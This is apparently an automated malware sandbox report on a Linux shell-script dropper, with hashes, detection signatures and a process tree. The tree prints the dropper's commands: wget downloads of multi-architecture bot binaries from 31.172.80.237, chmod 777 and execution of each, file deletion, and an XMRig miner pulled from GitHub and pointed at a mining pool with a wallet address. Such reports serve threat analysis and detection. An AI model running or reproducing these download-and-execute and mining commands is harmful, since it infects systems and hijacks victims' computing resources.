Analysis
-
max time kernel
95s -
max time network
96s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
09-11-2024 04:09
Static task
static1
Behavioral task
behavioral1
Sample
tyo2831qq.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
tyo2831qq.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
tyo2831qq.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
tyo2831qq.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
tyo2831qq.sh
-
Size
1KB
-
MD5
e12d6a1166c4e290ed4ba39f96c780ad
-
SHA1
57038253b27c0312102758d25a77b5d1859cba3e
-
SHA256
5f52ba20358d35d9705d4893c2e28bf333f9920d13053b21352be4a1fa6c8199
-
SHA512
276aabcf2037ad435a105ded3f3bfb8491fb391d5e1d49942d41774807c3f0b4e15d1ed18a57f0d783cd9aafee3ce1a96e561d3ee6da02b5d6c51fc579bb91ee
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule /tmp/xmrig family_xmrig /tmp/xmrig xmrig -
Xmrig family
-
Xmrig_linux family
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 752 chmod 757 chmod 781 chmod 808 chmod 736 chmod 746 chmod 769 chmod 773 chmod 791 chmod 838 chmod 761 chmod 765 chmod -
Executes dropped EXE 2 IoCs
Processes:
botsxmrigioc pid process /tmp/bots 747 bots /tmp/xmrig 839 xmrig -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
Processes:
tyo2831qq.mpsldescription ioc process File opened for reading /proc/net/route tyo2831qq.mpsl -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
Processes:
tyo2831qq.mpsldescription ioc process File opened for reading /proc/net/route tyo2831qq.mpsl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgettyo2831qq.mipsrmpid process 719 wget 737 tyo2831qq.mips 817 rm -
Writes file to tmp directory 12 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetdescription ioc process File opened for modification /tmp/bots wget File opened for modification /tmp/tyo2831qq.arm6 wget File opened for modification /tmp/tyo2831qq.x32 wget File opened for modification /tmp/tyo2831qq.i586 wget File opened for modification /tmp/tyo2831qq.m68k wget File opened for modification /tmp/tyo2831qq.arm7 wget File opened for modification /tmp/tyo2831qq.mips wget File opened for modification /tmp/tyo2831qq.mpsl wget File opened for modification /tmp/tyo2831qq.sh4 wget File opened for modification /tmp/tyo2831qq.x86 wget File opened for modification /tmp/tyo2831qq.ppc wget File opened for modification /tmp/xmrig wget
Processes
-
/tmp/tyo2831qq.sh/tmp/tyo2831qq.sh1⤵PID:716
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:719 -
/bin/chmodchmod 777 tyo2831qq.mips2⤵
- File and Directory Permissions Modification
PID:736 -
/tmp/tyo2831qq.mips./tyo2831qq.mips2⤵
- System Network Configuration Discovery
PID:737 -
/usr/bin/wgetwget http://31.172.80.237/bots2⤵
- Writes file to tmp directory
PID:740 -
/bin/chmodchmod 777 bots2⤵
- File and Directory Permissions Modification
PID:746 -
/tmp/bots./bots2⤵
- Executes dropped EXE
PID:747 -
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.mpsl2⤵
- Writes file to tmp directory
PID:750 -
/bin/chmodchmod 777 tyo2831qq.mpsl2⤵
- File and Directory Permissions Modification
PID:752 -
/tmp/tyo2831qq.mpsl./tyo2831qq.mpsl2⤵
- Reads system routing table
- Reads system network configuration
PID:753 -
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.sh42⤵
- Writes file to tmp directory
PID:756 -
/bin/chmodchmod 777 tyo2831qq.sh42⤵
- File and Directory Permissions Modification
PID:757 -
/tmp/tyo2831qq.sh4./tyo2831qq.sh42⤵PID:758
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.x862⤵
- Writes file to tmp directory
PID:760 -
/bin/chmodchmod 777 tyo2831qq.x862⤵
- File and Directory Permissions Modification
PID:761 -
/tmp/tyo2831qq.x86./tyo2831qq.x862⤵PID:762
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.arm62⤵
- Writes file to tmp directory
PID:764 -
/bin/chmodchmod 777 tyo2831qq.arm62⤵
- File and Directory Permissions Modification
PID:765 -
/tmp/tyo2831qq.arm6./tyo2831qq.arm62⤵PID:766
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.x322⤵
- Writes file to tmp directory
PID:768 -
/bin/chmodchmod 777 tyo2831qq.x322⤵
- File and Directory Permissions Modification
PID:769 -
/tmp/tyo2831qq.x32./tyo2831qq.x322⤵PID:770
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.ppc2⤵
- Writes file to tmp directory
PID:772 -
/bin/chmodchmod 777 tyo2831qq.ppc2⤵
- File and Directory Permissions Modification
PID:773 -
/tmp/tyo2831qq.ppc./tyo2831qq.ppc2⤵PID:774
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.i5862⤵
- Writes file to tmp directory
PID:776 -
/bin/chmodchmod 777 tyo2831qq.i5862⤵
- File and Directory Permissions Modification
PID:781 -
/tmp/tyo2831qq.i586./tyo2831qq.i5862⤵PID:782
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.m68k2⤵
- Writes file to tmp directory
PID:785 -
/bin/chmodchmod 777 tyo2831qq.m68k2⤵
- File and Directory Permissions Modification
PID:791 -
/tmp/tyo2831qq.m68k./tyo2831qq.m68k2⤵PID:793
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.spc2⤵PID:796
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.arm42⤵PID:799
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.arm72⤵
- Writes file to tmp directory
PID:803 -
/bin/chmodchmod 777 tyo2831qq.arm72⤵
- File and Directory Permissions Modification
PID:808 -
/tmp/tyo2831qq.arm7./tyo2831qq.arm72⤵PID:809
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.arm52⤵PID:812
-
/bin/rmrm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x862⤵
- System Network Configuration Discovery
PID:817 -
/usr/bin/wgetwget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig2⤵
- Writes file to tmp directory
PID:818 -
/bin/chmodchmod 777 xmrig2⤵
- File and Directory Permissions Modification
PID:838 -
/tmp/xmrig./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B2⤵
- Executes dropped EXE
PID:839
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
215B
MD55e330d55bb520266447b86c2c47fdc0f
SHA128e862fa757fba4f7dca7fbeac6433b1bdf75ca7
SHA256ea7045dc1e2dd6c47941880d671c5ba8536a20728965c362881e7fee0fb3d1b2
SHA5128232b08e80b64a8fe7b46140e9ad7a170a06a66e59a6f728b9fda80531033d2ebe0fe68c0dde05a0e832d96c8817678e1ae27a8729a7e6d0c23ad06c8b9a6262
-
Filesize
16KB
MD52615e32f9e7b42b36ba1f3dd6f8f7e3c
SHA14286d999a1a76da1e68cb227e01de237ef5fcf68
SHA256e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078
SHA512b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78
-
Filesize
7.9MB
MD549fde861072798623bf35de4794f7d3d
SHA11c9b225d3e34db9c2a0fecb9f2c254da1371f953
SHA2568268144d8232fc0dae86c2536eef50916e4ee9a23b15a561aa72971714359383
SHA51214393a6a7f9103340338e74457c6f95eb7180d2a90b87e01945be621a0d0798c05fdfb08ec3dbc2ca61ee2cbb6299b48e8b27c01b00913b5e5e9ed704318ac22